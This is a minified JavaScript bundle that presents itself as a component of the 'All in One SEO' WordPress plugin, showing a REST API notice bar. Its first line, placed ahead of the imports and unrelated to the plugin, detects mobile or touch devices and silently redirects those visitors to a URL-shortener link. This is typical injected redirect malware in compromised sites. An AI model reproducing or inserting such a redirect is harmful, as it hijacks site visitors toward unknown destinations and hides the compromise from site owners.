(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{c as _,b as p}from"./app-core.c8323d51.js";import{S as d}from"./LogoGear.93a225a7.js";import{_ as r}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as m,f as n,i as a,j as e,a0 as g}from"./vendor-vue-ui.232c7c36.js";import{a as o,_ as t}from"./vendor-other.39e59221.js";const s="all-in-one-seo-pack",f={setup(){return{rootStore:p()}},components:{SvgAioseoLogoGear:d},data(){return{strings:{boldText:o("<strong>%1$s %2$s</strong>","AIOSEO",this.rootStore.isPro?"Pro":""),linkText:t("Click here to learn more",s)}}},computed:{link(){return o('<strong><a href="%1$s" target="_blank" class="text-white">%2$s</a></strong>',_.getDocUrl("restApi"),this.strings.linkText)},upgradeText(){return o(t("%1$s relies on the WordPress Rest API and your site might have it disabled. %2$s.",s),this.strings.boldText,this.link)}},mounted(){document.body.classList.add("aioseo-has-bar")},beforeUnmount(){document.body.classList.remove("aioseo-has-bar")}},h={class:"aioseo-api-bar"},x={class:"upgrade-text"},b=["innerHTML"];function y(i,c,v,A,L,l){const u=m("svg-aioseo-logo-gear");return n(),a("div",h,[e("div",x,[g(u),e("div",{innerHTML:l.upgradeText},null,8,b)])])}const R=r(f,[["render",y]]),$={};function k(i,c){return n(),a("div")}const U=r($,[["render",k]]);export{U as C,R as a};
